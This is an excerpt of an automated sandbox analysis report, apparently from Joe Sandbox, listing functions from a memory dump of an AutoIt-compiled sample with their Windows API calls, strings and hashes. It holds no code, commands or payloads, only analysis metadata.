Instruction ID: 24fea9e38f0788b183e938e175e8d9142eeb006de6e4171bf57fec4cee5afe14
Opcode Fuzzy Hash: 8136b30e1e8b8f64e63a0245841e2bef99711236bb5f8f19ff2776ce4b1cbab8
Instruction Fuzzy Hash: 2302AB705483419FC768EF20C8819AFBBE6EF99314F10491DF486972E2DB31EA49CB56

Function 00662D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00662DDD
GetMenuItemCount.USER32(006C5890), ref: 00662E66
DeleteMenu.USER32(006C5890,00000005,00000000,000000F5,?,?), ref: 00662EF6
DeleteMenu.USER32(006C5890,00000004,00000000), ref: 00662EFE
DeleteMenu.USER32(006C5890,00000006,00000000), ref: 00662F06
DeleteMenu.USER32(006C5890,00000003,00000000), ref: 00662F0E
GetMenuItemCount.USER32(006C5890), ref: 00662F16
SetMenuItemInfoW.USER32(006C5890,00000004,00000000,00000030), ref: 00662F4C
GetCursorPos.USER32(?), ref: 00662F56
SetForegroundWindow.USER32(00000000), ref: 00662F5F
TrackPopupMenuEx.USER32(006C5890,00000000,?,00000000,00000000,00000000), ref: 00662F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00662F7E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: dfbf94aa3e73bcff70cf528ffeba73b46830c8759e5d68a8bb10ee9738571854
Instruction ID: 0aae22f7e720f112032d0d078f6aa8840262b542f63873210fe0f0af8d8671a5
Opcode Fuzzy Hash: dfbf94aa3e73bcff70cf528ffeba73b46830c8759e5d68a8bb10ee9738571854
Instruction Fuzzy Hash: 3671F570641A07BBEB219F54DC69FEABF6AFF04314F100226F615AA2E0C7725C60DB95

Function 006788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006788D7
CoInitialize.OLE32(00000000), ref: 00678904
CoUninitialize.OLE32 ref: 0067890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00678A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00678B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00692C0C), ref: 00678B6F
CoGetObject.OLE32(?,00000000,00692C0C,?), ref: 00678B92
SetErrorMode.KERNEL32(00000000), ref: 00678BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00678C25
VariantClear.OLEAUT32(?), ref: 00678C35

Strings

,,i, xrefs: 006788C1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,i
API String ID: 2395222682-3276395716
Opcode ID: 8e5319aa2c5fe81dab8bdde0b6bfa6484ff054b473f663180ba8ea0cd99340ff
Instruction ID: 997a86ceec281e6b946a5b1d84f369c1fea042bf7ac2c6c6c8012c235ad9671d
Opcode Fuzzy Hash: 8e5319aa2c5fe81dab8bdde0b6bfa6484ff054b473f663180ba8ea0cd99340ff
Instruction Fuzzy Hash: 5CC127B1604305AFD700DF28C88896BB7EAFF89748F00895DF9899B251DB71ED06CB52

Function 006577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

_memset.LIBCMT ref: 0065786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00657902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0065792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00657935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065793A

Strings

\IPC$, xrefs: 00657882
\CLSID, xrefs: 00657822
SOFTWARE\Classes\, xrefs: 0065780C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 23ada40951fac5400f0b64de67f2dfd82d2e109fca1db5c3bc1f5369d33fc8e2
Instruction ID: 059d93d288d16b3b8665d4fc90cd7aa04806418c0e7d2f368c890e8d11d7d62c
Opcode Fuzzy Hash: 23ada40951fac5400f0b64de67f2dfd82d2e109fca1db5c3bc1f5369d33fc8e2
Instruction Fuzzy Hash: 67411972C54229AECF15EFA4EC55DEEB77ABF04314F004129E905A32A1DB316E08CBA4

Function 00680E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31

Strings

HKEY_USERS, xrefs: 00680F32
HKEY_LOCAL_MACHINE, xrefs: 00680E9A
HKCC, xrefs: 00680EFF
HKEY_CURRENT_USER, xrefs: 00680F10
HKEY_CLASSES_ROOT, xrefs: 00680EC4
HKLM, xrefs: 00680EAF
HKEY_CURRENT_CONFIG, xrefs: 00680EEE
HKCR, xrefs: 00680ED9
HKCU, xrefs: 00680F21
HKU, xrefs: 00680F43

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 588e120682e037abeb91ee2d970aed7e1cdadecb205afc03882f21224d5943d0
Instruction ID: 59ba3428da1cecc4ff5e1f2f028ea4d39c69f6e117ba0544c30a69cb58440162
Opcode Fuzzy Hash: 588e120682e037abeb91ee2d970aed7e1cdadecb205afc03882f21224d5943d0
Instruction Fuzzy Hash: 9841807114025A8BEFA4EF10E895AEF3763AF11304F548968FE551B293DB309D5ACB60

Function 0065F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0063E2A0,00000010,?,Bad directive syntax error,0068F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0065F7C2
LoadStringW.USER32(00000000,?,0063E2A0,00000010), ref: 0065F7C9

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

_wprintf.LIBCMT ref: 0065F7FC
__swprintf.LIBCMT ref: 0065F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0065F88D

Strings

., xrefs: 0065F873
Line %d (File "%s"):, xrefs: 0065F833
%s (%d) : ==> %s.: %s %s, xrefs: 0065F7F7
Line %d:, xrefs: 0065F818
Error: , xrefs: 0065F85B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 9b95f18bb2873d8e9037901abce3617d5a2bab8f4d35904bc643d65d2d1c0f63
Instruction ID: fc2c0427950cdaa9c4c1c13c9eb4ae765bf00b9bf61f44ed1d2ef8e85e244012
Opcode Fuzzy Hash: 9b95f18bb2873d8e9037901abce3617d5a2bab8f4d35904bc643d65d2d1c0f63
Instruction Fuzzy Hash: 5B216D7294021EBFCF15EF90CC0AEEE773ABF18304F04486AF515661A1EA71AA58DB54

Function 006652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

Part of subcall function 00607924: _memmove.LIBCMT ref: 006079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00665330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00665346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00665357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00665369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0066537A

Strings

open , xrefs: 006652DF
alias PlayMe, xrefs: 00665309
close PlayMe, xrefs: 00665341, 0066536E
play PlayMe, xrefs: 00665375
play PlayMe wait, xrefs: 00665364
status PlayMe mode, xrefs: 0066532B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 6763af3d7938752acbb349f716eb38c8fd4ce1d27195d7dfabc99a2a3820fad6
Instruction ID: ba3c0f86d4972637b26387af4608254d267837c5b454134d54cf4bf0fa308fec
Opcode Fuzzy Hash: 6763af3d7938752acbb349f716eb38c8fd4ce1d27195d7dfabc99a2a3820fad6
Instruction Fuzzy Hash: 40118F71E901697DD764BB61CC4ADFFBBBEEB91F44F100429B402A31D1EEA02D45C6A4

Function 006646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006646D2
gethostname.WSOCK32(?,00000100), ref: 006646EC
gethostbyname.WSOCK32(?), ref: 006646F9
_wcscpy.LIBCMT ref: 00664721
_memmove.LIBCMT ref: 00664734
inet_ntoa.WSOCK32(?), ref: 0066473F
_strcat.LIBCMT ref: 0066474D
_wcscpy.LIBCMT ref: 00664764
WSACleanup.WSOCK32 ref: 00664772
_wcscpy.LIBCMT ref: 00664780

Strings

0.0.0.0, xrefs: 0066471B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 535f9779364300f189a05ab9cff7c1b28d6e7d19eb45ff6286cc95071dd0b37f
Instruction ID: 6141a3f7097b7fc253f54a86ddccada38957f232eccadd3b3d2b20e28ae9d771
Opcode Fuzzy Hash: 535f9779364300f189a05ab9cff7c1b28d6e7d19eb45ff6286cc95071dd0b37f
Instruction Fuzzy Hash: BE11E471504115BFDB60AB30EC4AEEA7BBEEF02711F0406BAF44596191FF719AC28B54

Function 00664F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00664F7A

Part of subcall function 0062049F: timeGetTime.WINMM(?,76C1B400,00610E7B), ref: 006204A3

Sleep.KERNEL32(0000000A), ref: 00664FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00664FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00664FEC
SetActiveWindow.USER32 ref: 0066500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00665019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00665038
Sleep.KERNEL32(000000FA), ref: 00665043
IsWindow.USER32 ref: 0066504F
EndDialog.USER32(00000000), ref: 00665060

Strings

BUTTON, xrefs: 00664FDE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4f90701e344ed8c4a01f79d582b19ae301acaa099895f58cdbdd1a3de0748420
Instruction ID: 7bc36d4c609671bacbdaa037222ecb2bb8b0470a026d6f1d117bd67a52f0d578
Opcode Fuzzy Hash: 4f90701e344ed8c4a01f79d582b19ae301acaa099895f58cdbdd1a3de0748420
Instruction Fuzzy Hash: B5218C70204605BFE7106F60EC89E763BABEB55745F643128F103822B1DB71DE908B66

Function 0066D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

CoInitialize.OLE32(00000000), ref: 0066D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0066D67D
SHGetDesktopFolder.SHELL32(?), ref: 0066D691
CoCreateInstance.OLE32(00692D7C,00000000,00000001,006B8C1C,?), ref: 0066D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0066D74C
CoTaskMemFree.OLE32(?,?), ref: 0066D7A4
_memset.LIBCMT ref: 0066D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0066D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0066D840
CoTaskMemFree.OLE32(00000000), ref: 0066D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0066D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0066D880

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: d42850d29371643ab3b7d3ae2672cf5c2b83f0c9e371b2da154ed6547c954140
Instruction ID: adc329acbb3d4c032272cb056be3c1a11f16492650e9e8743f8ee3c0ac0e7492
Opcode Fuzzy Hash: d42850d29371643ab3b7d3ae2672cf5c2b83f0c9e371b2da154ed6547c954140
Instruction Fuzzy Hash: 44B1EA75A00109AFDB44DFA4C888DAEBBBAEF48314F148569F909EB261DB30ED45CB54

Function 0065C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0065C283
GetWindowRect.USER32(00000000,?), ref: 0065C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065C2F3
GetDlgItem.USER32(?,00000002), ref: 0065C2FE
GetWindowRect.USER32(00000000,?), ref: 0065C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065C364
GetDlgItem.USER32(?,000003E9), ref: 0065C372
GetWindowRect.USER32(00000000,?), ref: 0065C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065C3C6
GetDlgItem.USER32(?,000003EA), ref: 0065C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0065C3FE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
Instruction ID: 9256800d42b90784d6cebc2646a532cfcf3fbc102a5d8836279f576aded79691
Opcode Fuzzy Hash: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
Instruction Fuzzy Hash: 97514071B00305BFDB18CFA9DD89AAEBBB6EB88311F14822DF915D7290D7709D448B10

Function 0060201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006020D3
KillTimer.USER32(-00000001,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0060216E
DestroyAcceleratorTable.USER32(00000000), ref: 0063BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BD0A
DeleteObject.GDI32(00000000), ref: 0063BD1C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 4c60cbc8ac7aaf7fecf871888242d332e7dd6fea8e48a3b11b9a5f8bae4da849
Instruction ID: 084f9aa43137e194188f51e3b8b6aca0983c35b200484515ac2337715f109ff1
Opcode Fuzzy Hash: 4c60cbc8ac7aaf7fecf871888242d332e7dd6fea8e48a3b11b9a5f8bae4da849
Instruction Fuzzy Hash: 3B616730141A11EFDB399F14DD68B6BB7F3FF40312F50A529E6438AAA0C770A891DB90

Function 006021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC

GetSysColor.USER32(0000000F), ref: 006021D3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 298a9ad1848567527b19cfbeb176aa1fecfd15796fd2e82787746a195e13591b
Instruction ID: c46ee624f7739e6d369c14a67329ac29cb0d0efd19210daadca50f40bd599a4d
Opcode Fuzzy Hash: 298a9ad1848567527b19cfbeb176aa1fecfd15796fd2e82787746a195e13591b
Instruction Fuzzy Hash: 65419031040141ABDB295F68DC9CBFA3B67EF46321F145365FE658A2E1C7318D82DB61

Function 0066A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0068F910), ref: 0066A90B
GetDriveTypeW.KERNEL32(00000061,006B89A0,00000061), ref: 0066A9D5
_wcscpy.LIBCMT ref: 0066A9FF

Strings

cdrom, xrefs: 0066A927
all, xrefs: 0066A911
removable, xrefs: 0066A93D
network, xrefs: 0066A969
ramdisk, xrefs: 0066A97F
unknown, xrefs: 0066A996
fixed, xrefs: 0066A953

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 2c42dc7f0273bdd93b4fe60e64dda0cb07c4c3883866367eb59edcaf42a68497
Instruction ID: aaffd12cd4406c5aab7661eeeb49d98dc97b48ba854d34abcdf19149bd127507
Opcode Fuzzy Hash: 2c42dc7f0273bdd93b4fe60e64dda0cb07c4c3883866367eb59edcaf42a68497
Instruction Fuzzy Hash: 0451A931158301AFC744EF54C992AAFB7ABEF84304F54492EF496672A2DB319909CB93

Function 00609837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00609862
__swprintf.LIBCMT ref: 006098AC
__i64tow.LIBCMT ref: 0063F5E6

Strings

0x%p, xrefs: 0063F5C8
True, xrefs: 0063F5A7
False, xrefs: 0063F5AE
%.15g, xrefs: 006098A6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f8fea7afa10db1ac4eb9468fc520545603c4d426e2c90f6b3fb30db5db4fe76b
Instruction ID: 33d9ea78ff7e64fceb19d7d288533892e713e0560f520899e9543d7ca394d158
Opcode Fuzzy Hash: f8fea7afa10db1ac4eb9468fc520545603c4d426e2c90f6b3fb30db5db4fe76b
Instruction Fuzzy Hash: 2B41D671944615AFEB28DF34D842EB773EBEF05310F20886EE549D7392EA719942CB60

Function 00687152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068716A
